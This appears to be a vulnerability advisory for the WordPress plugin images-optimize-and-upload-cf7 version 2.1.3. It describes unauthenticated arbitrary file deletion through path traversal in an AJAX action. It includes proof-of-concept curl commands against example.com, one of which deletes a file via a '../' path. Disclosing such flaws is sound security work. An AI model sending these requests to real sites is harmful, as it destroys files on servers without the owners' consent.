The plugin does not validate the file to be deleted via an AJAX action available to unauthenticated users, which could allow them to delete arbitrary files on the server via path traversal attack.
1. Install contact-form-7 (dependency) 2. Install the vulnerable plugin (images-optimize-and-upload-cf7 version 2.1.3) 3. Invoke curl to create a potentially missing upload directory (required for the exploit to work): curl ‘https://example.com/wp-admin/admin-ajax.php?action=yr_api_uploader’ 4. Invoke the following curl command to delete the delete.me file at the root of the blog: curl ‘https://example.com/wp-admin/admin-ajax.php?action=yr_api_delete’ \ --data ‘file=…/…/…/delete.me’
CPE | Name | Operator | Version |
---|---|---|---|
images-optimize-and-upload-cf7 | eq | * |